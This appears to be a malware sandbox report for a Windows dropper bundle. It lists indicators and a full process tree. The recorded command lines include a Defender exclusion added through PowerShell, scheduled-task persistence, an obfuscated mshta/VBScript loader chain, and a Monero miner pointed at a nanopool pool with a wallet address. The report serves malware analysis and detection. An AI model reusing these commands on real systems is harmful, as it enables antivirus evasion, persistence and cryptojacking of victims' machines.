Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeCreateTokenPrivilege 1752 Sun05d60bc3b96248e5.exe Token: SeAssignPrimaryTokenPrivilege 1752 Sun05d60bc3b96248e5.exe Token: SeLockMemoryPrivilege 1752 Sun05d60bc3b96248e5.exe Token: SeIncreaseQuotaPrivilege 1752 Sun05d60bc3b96248e5.exe Token: SeMachineAccountPrivilege 1752 Sun05d60bc3b96248e5.exe Token: SeTcbPrivilege 1752 Sun05d60bc3b96248e5.exe Token: SeSecurityPrivilege 1752 Sun05d60bc3b96248e5.exe Token: SeTakeOwnershipPrivilege 1752 Sun05d60bc3b96248e5.exe Token: SeLoadDriverPrivilege 1752 Sun05d60bc3b96248e5.exe Token: SeSystemProfilePrivilege 1752 Sun05d60bc3b96248e5.exe Token: SeSystemtimePrivilege 1752 Sun05d60bc3b96248e5.exe Token: SeProfSingleProcessPrivilege 1752 Sun05d60bc3b96248e5.exe Token: SeIncBasePriorityPrivilege 1752 Sun05d60bc3b96248e5.exe Token: SeCreatePagefilePrivilege 1752 Sun05d60bc3b96248e5.exe Token: SeCreatePermanentPrivilege 1752 Sun05d60bc3b96248e5.exe Token: SeBackupPrivilege 1752 Sun05d60bc3b96248e5.exe Token: SeRestorePrivilege 1752 Sun05d60bc3b96248e5.exe Token: SeShutdownPrivilege 1752 Sun05d60bc3b96248e5.exe Token: SeDebugPrivilege 1752 Sun05d60bc3b96248e5.exe Token: SeAuditPrivilege 1752 Sun05d60bc3b96248e5.exe Token: SeSystemEnvironmentPrivilege 1752 Sun05d60bc3b96248e5.exe Token: SeChangeNotifyPrivilege 1752 Sun05d60bc3b96248e5.exe Token: SeRemoteShutdownPrivilege 1752 Sun05d60bc3b96248e5.exe Token: SeUndockPrivilege 1752 Sun05d60bc3b96248e5.exe Token: SeSyncAgentPrivilege 1752 Sun05d60bc3b96248e5.exe Token: SeEnableDelegationPrivilege 1752 Sun05d60bc3b96248e5.exe Token: SeManageVolumePrivilege 1752 Sun05d60bc3b96248e5.exe Token: SeImpersonatePrivilege 1752 Sun05d60bc3b96248e5.exe Token: SeCreateGlobalPrivilege 1752 Sun05d60bc3b96248e5.exe Token: 31 1752 Sun05d60bc3b96248e5.exe Token: 32 1752 Sun05d60bc3b96248e5.exe Token: 33 1752 Sun05d60bc3b96248e5.exe Token: 34 1752 Sun05d60bc3b96248e5.exe Token: 35 1752 Sun05d60bc3b96248e5.exe Token: SeDebugPrivilege 648 Sun059375dac544fc4a.exe Token: SeDebugPrivilege 1724 Sun050462125c7d35.exe Token: SeDebugPrivilege 836 powershell.exe Token: SeDebugPrivilege 2592 8873424.exe Token: SeDebugPrivilege 2780 2.exe Token: SeDebugPrivilege 2712 PublicDwlBrowser1100.exe Token: SeDebugPrivilege 1972 WerFault.exe Token: SeDebugPrivilege 3004 5675673.exe Token: SeDebugPrivilege 2628 BearVpn 3.exe Token: SeDebugPrivilege 2192 taskkill.exe Token: SeDebugPrivilege 2084 2007722.exe Token: SeDebugPrivilege 2924 7035165.exe Token: SeDebugPrivilege 948 3979967.exe Token: SeDebugPrivilege 1556 taskkill.exe Token: SeDebugPrivilege 2496 WerFault.exe Token: SeDebugPrivilege 1916 Sun052bbd8bebd9.exe Token: SeDebugPrivilege 2172 udptest.exe Token: SeDebugPrivilege 2656 conhost.exe Token: SeDebugPrivilege 1780 taskkill.exe Token: SeDebugPrivilege 1784 postback.exe Token: SeDebugPrivilege 2500 WerFault.exe Token: SeDebugPrivilege 1084 services64.exe Token: SeDebugPrivilege 392 WerFault.exe Token: SeDebugPrivilege 3616 WerFault.exe Token: SeDebugPrivilege 2480 1643021.exe Token: SeLockMemoryPrivilege 3924 explorer.exe Token: SeLockMemoryPrivilege 3924 explorer.exe Token: SeDebugPrivilege 848 WerFault.exe Token: SeDebugPrivilege 1228 3979967.exe Token: SeDebugPrivilege 3376 WerFault.exe -
Suspicious use of FindShellTrayWindow 6 IoCs
pid Process 2772 setup_2.tmp 1640 ultramediaburner.tmp 3624 iexplore.exe 4012 installer.exe 3624 iexplore.exe 3624 iexplore.exe -
Suspicious use of SetWindowsHookEx 16 IoCs
pid Process 3624 iexplore.exe 3624 iexplore.exe 3792 IEXPLORE.EXE 3792 IEXPLORE.EXE 3792 IEXPLORE.EXE 3792 IEXPLORE.EXE 3624 iexplore.exe 3624 iexplore.exe 3856 IEXPLORE.EXE 3856 IEXPLORE.EXE 3856 IEXPLORE.EXE 3856 IEXPLORE.EXE 3624 iexplore.exe 3624 iexplore.exe 764 IEXPLORE.EXE 764 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2028 wrote to memory of 1764 2028 setup_x86_x64_install.exe 27 PID 2028 wrote to memory of 1764 2028 setup_x86_x64_install.exe 27 PID 2028 wrote to memory of 1764 2028 setup_x86_x64_install.exe 27 PID 2028 wrote to memory of 1764 2028 setup_x86_x64_install.exe 27 PID 2028 wrote to memory of 1764 2028 setup_x86_x64_install.exe 27 PID 2028 wrote to memory of 1764 2028 setup_x86_x64_install.exe 27 PID 2028 wrote to memory of 1764 2028 setup_x86_x64_install.exe 27 PID 1764 wrote to memory of 1644 1764 setup_installer.exe 28 PID 1764 wrote to memory of 1644 1764 setup_installer.exe 28 PID 1764 wrote to memory of 1644 1764 setup_installer.exe 28 PID 1764 wrote to memory of 1644 1764 setup_installer.exe 28 PID 1764 wrote to memory of 1644 1764 setup_installer.exe 28 PID 1764 wrote to memory of 1644 1764 setup_installer.exe 28 PID 1764 wrote to memory of 1644 1764 setup_installer.exe 28 PID 1644 wrote to memory of 1776 1644 setup_install.exe 30 PID 1644 wrote to memory of 1776 1644 setup_install.exe 30 PID 1644 wrote to memory of 1776 1644 setup_install.exe 30 PID 1644 wrote to memory of 1776 1644 setup_install.exe 30 PID 1644 wrote to memory of 1776 1644 setup_install.exe 30 PID 1644 wrote to memory of 1776 1644 setup_install.exe 30 PID 1644 wrote to memory of 1776 1644 setup_install.exe 30 PID 1644 wrote to memory of 428 1644 setup_install.exe 32 PID 1644 wrote to memory of 428 1644 setup_install.exe 32 PID 1644 wrote to memory of 428 1644 setup_install.exe 32 PID 1644 wrote to memory of 428 1644 setup_install.exe 32 PID 1644 wrote to memory of 428 1644 setup_install.exe 32 PID 1644 wrote to memory of 428 1644 setup_install.exe 32 PID 1644 wrote to memory of 428 1644 setup_install.exe 32 PID 1644 wrote to memory of 268 1644 setup_install.exe 31 PID 1644 wrote to memory of 268 1644 setup_install.exe 31 PID 1644 wrote to memory of 268 1644 setup_install.exe 31 PID 1644 wrote to memory of 268 1644 setup_install.exe 31 PID 1644 wrote to memory of 268 1644 setup_install.exe 31 PID 1644 wrote to memory of 268 1644 setup_install.exe 31 PID 1644 wrote to memory of 268 1644 setup_install.exe 31 PID 1644 wrote to memory of 1056 1644 setup_install.exe 33 PID 1644 wrote to memory of 1056 1644 setup_install.exe 33 PID 1644 wrote to memory of 1056 1644 setup_install.exe 33 PID 1644 wrote to memory of 1056 1644 setup_install.exe 33 PID 1644 wrote to memory of 1056 1644 setup_install.exe 33 PID 1644 wrote to memory of 1056 1644 setup_install.exe 33 PID 1644 wrote to memory of 1056 1644 setup_install.exe 33 PID 1776 wrote to memory of 836 1776 cmd.exe 40 PID 1776 wrote to memory of 836 1776 cmd.exe 40 PID 1776 wrote to memory of 836 1776 cmd.exe 40 PID 1776 wrote to memory of 836 1776 cmd.exe 40 PID 1776 wrote to memory of 836 1776 cmd.exe 40 PID 1776 wrote to memory of 836 1776 cmd.exe 40 PID 1776 wrote to memory of 836 1776 cmd.exe 40 PID 1644 wrote to memory of 380 1644 setup_install.exe 39 PID 1644 wrote to memory of 380 1644 setup_install.exe 39 PID 1644 wrote to memory of 380 1644 setup_install.exe 39 PID 1644 wrote to memory of 380 1644 setup_install.exe 39 PID 1644 wrote to memory of 380 1644 setup_install.exe 39 PID 1644 wrote to memory of 380 1644 setup_install.exe 39 PID 1644 wrote to memory of 380 1644 setup_install.exe 39 PID 1644 wrote to memory of 1068 1644 setup_install.exe 38 PID 1644 wrote to memory of 1068 1644 setup_install.exe 38 PID 1644 wrote to memory of 1068 1644 setup_install.exe 38 PID 1644 wrote to memory of 1068 1644 setup_install.exe 38 PID 1644 wrote to memory of 1068 1644 setup_install.exe 38 PID 1644 wrote to memory of 1068 1644 setup_install.exe 38 PID 1644 wrote to memory of 1068 1644 setup_install.exe 38 PID 1644 wrote to memory of 976 1644 setup_install.exe 37
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2028 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1764 -
C:\Users\Admin\AppData\Local\Temp\7zS4E666104\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS4E666104\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1644 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:1776 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:836
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun052bbd8bebd9.exe4⤵
- Loads dropped DLL
PID:268 -
C:\Users\Admin\AppData\Local\Temp\7zS4E666104\Sun052bbd8bebd9.exeSun052bbd8bebd9.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1916
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun05ac1b0207d3ff3b8.exe4⤵
- Loads dropped DLL
PID:428 -
C:\Users\Admin\AppData\Local\Temp\7zS4E666104\Sun05ac1b0207d3ff3b8.exeSun05ac1b0207d3ff3b8.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
PID:920 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 920 -s 9766⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:1972
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun05532f7abc.exe4⤵
- Loads dropped DLL
PID:1056 -
C:\Users\Admin\AppData\Local\Temp\7zS4E666104\Sun05532f7abc.exeSun05532f7abc.exe5⤵
- Executes dropped EXE
PID:1108
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun050462125c7d35.exe4⤵
- Loads dropped DLL
PID:1540 -
C:\Users\Admin\AppData\Local\Temp\7zS4E666104\Sun050462125c7d35.exeSun050462125c7d35.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1724 -
C:\ProgramData\8873424.exe"C:\ProgramData\8873424.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2592 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2592 -s 17327⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:2500
-
-
-
C:\ProgramData\5533121.exe"C:\ProgramData\5533121.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
PID:2692 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2968
-
-
-
C:\ProgramData\7035165.exe"C:\ProgramData\7035165.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:2924
-
-
C:\ProgramData\5675673.exe"C:\ProgramData\5675673.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3004 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3004 -s 17167⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:392
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun05d60bc3b96248e5.exe4⤵
- Loads dropped DLL
PID:976 -
C:\Users\Admin\AppData\Local\Temp\7zS4E666104\Sun05d60bc3b96248e5.exeSun05d60bc3b96248e5.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:1752 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:1420
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2192
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun059375dac544fc4a.exe4⤵
- Loads dropped DLL
PID:1068 -
C:\Users\Admin\AppData\Local\Temp\7zS4E666104\Sun059375dac544fc4a.exeSun059375dac544fc4a.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:648 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2528 -
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵PID:2656
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵PID:760
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
PID:2916
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1084 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵PID:1576
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
PID:3100
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵
- Executes dropped EXE
PID:2092
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3924
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2712 -
C:\ProgramData\1643021.exe"C:\ProgramData\1643021.exe"8⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:2480 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2480 -s 17209⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
PID:1668
-
-
-
C:\ProgramData\5058535.exe"C:\ProgramData\5058535.exe"8⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
PID:1960
-
-
C:\ProgramData\3979967.exe"C:\ProgramData\3979967.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:948 -
C:\ProgramData\3979967.exe"C:\ProgramData\3979967.exe"9⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1228
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 948 -s 7089⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:848
-
-
-
C:\ProgramData\3803641.exe"C:\ProgramData\3803641.exe"8⤵
- Executes dropped EXE
PID:584 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCrIPt: close ( crEateobJeCt ("wsCRIpT.sHEll" ). RUN ( "C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\ProgramData\3803641.exe"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If """"== """" for %l In ( ""C:\ProgramData\3803641.exe"") do taskkill -Im ""%~nxl"" /F " , 0 , TRuE) )9⤵PID:2532
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\ProgramData\3803641.exe" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If ""== "" for %l In ( "C:\ProgramData\3803641.exe") do taskkill -Im "%~nxl" /F10⤵PID:1800
-
C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exEC3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw911⤵
- Executes dropped EXE
PID:816 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCrIPt: close ( crEateobJeCt ("wsCRIpT.sHEll" ). RUN ( "C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If ""-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 ""== """" for %l In ( ""C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"") do taskkill -Im ""%~nxl"" /F " , 0 , TRuE) )12⤵
- Modifies Internet Explorer settings
PID:2292 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If "-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 "== "" for %l In ( "C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE") do taskkill -Im "%~nxl" /F13⤵PID:892
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" .\zyYHQ.U,xGNjygcjY12⤵PID:1964
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -Im "3803641.exe" /F11⤵
- Kills process with taskkill
PID:1780
-
-
-
-
-
C:\ProgramData\2007722.exe"C:\ProgramData\2007722.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2084 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 10689⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:3376
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2780 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2780 -s 13728⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:2496
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
- Executes dropped EXE
PID:2816 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit8⤵PID:1592
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "setup.exe" /f9⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1556
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\udptest.exe"C:\Users\Admin\AppData\Local\Temp\udptest.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2172
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵
- Executes dropped EXE
PID:2400 -
C:\Users\Admin\AppData\Local\Temp\is-Q91Q4.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-Q91Q4.tmp\setup_2.tmp" /SL5="$10180,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"8⤵
- Executes dropped EXE
PID:2324 -
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT9⤵
- Executes dropped EXE
PID:2356 -
C:\Users\Admin\AppData\Local\Temp\is-GACG0.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-GACG0.tmp\setup_2.tmp" /SL5="$301AE,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT10⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:2772 -
C:\Users\Admin\AppData\Local\Temp\is-P1FAG.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-P1FAG.tmp\postback.exe" ss111⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:1784 -
C:\Windows\SysWOW64\explorer.exeexplorer.exe ss112⤵PID:2536
-
C:\Users\Admin\AppData\Local\Temp\FVSCYGY9c.exe"C:\Users\Admin\AppData\Local\Temp\FVSCYGY9c.exe"13⤵
- Executes dropped EXE
PID:1792 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1792 -s 97614⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:3616
-
-
-
C:\Users\Admin\AppData\Local\Temp\8cL2V1GZT.exe"C:\Users\Admin\AppData\Local\Temp\8cL2V1GZT.exe"13⤵
- Executes dropped EXE
PID:3772
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe"7⤵PID:1228
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a8⤵
- Executes dropped EXE
PID:2680
-
-
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"7⤵
- Executes dropped EXE
PID:1840
-
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2628
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun05640630a6aa.exe4⤵
- Loads dropped DLL
PID:380 -
C:\Users\Admin\AppData\Local\Temp\7zS4E666104\Sun05640630a6aa.exeSun05640630a6aa.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1420
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun054fe19a12cb3.exe4⤵
- Loads dropped DLL
PID:1796 -
C:\Users\Admin\AppData\Local\Temp\7zS4E666104\Sun054fe19a12cb3.exeSun054fe19a12cb3.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:520 -
C:\Users\Admin\AppData\Local\Temp\is-EOOQ3.tmp\Sun054fe19a12cb3.tmp"C:\Users\Admin\AppData\Local\Temp\is-EOOQ3.tmp\Sun054fe19a12cb3.tmp" /SL5="$40134,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS4E666104\Sun054fe19a12cb3.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1044 -
C:\Users\Admin\AppData\Local\Temp\is-3U7FO.tmp\46807GHF____.exe"C:\Users\Admin\AppData\Local\Temp\is-3U7FO.tmp\46807GHF____.exe" /S /UID=burnerch27⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
PID:2436 -
C:\Program Files\Java\LSOFBQZDLS\ultramediaburner.exe"C:\Program Files\Java\LSOFBQZDLS\ultramediaburner.exe" /VERYSILENT8⤵
- Executes dropped EXE
PID:1876 -
C:\Users\Admin\AppData\Local\Temp\is-ND9DE.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-ND9DE.tmp\ultramediaburner.tmp" /SL5="$20294,281924,62464,C:\Program Files\Java\LSOFBQZDLS\ultramediaburner.exe" /VERYSILENT9⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:1640 -
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu10⤵
- Executes dropped EXE
PID:1336
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\43-d4514-57b-16baf-6900332f27ec3\SHutorakaepae.exe"C:\Users\Admin\AppData\Local\Temp\43-d4514-57b-16baf-6900332f27ec3\SHutorakaepae.exe"8⤵
- Executes dropped EXE
PID:2668 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e69⤵
- Modifies Internet Explorer settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:3624 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3624 CREDAT:275457 /prefetch:210⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:3792
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3624 CREDAT:1127433 /prefetch:210⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:3856
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3624 CREDAT:865296 /prefetch:210⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:764
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3624 CREDAT:1455132 /prefetch:210⤵PID:856
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3624 CREDAT:1193040 /prefetch:210⤵PID:9064
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad9⤵PID:2660
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=18514839⤵PID:3136
-
-
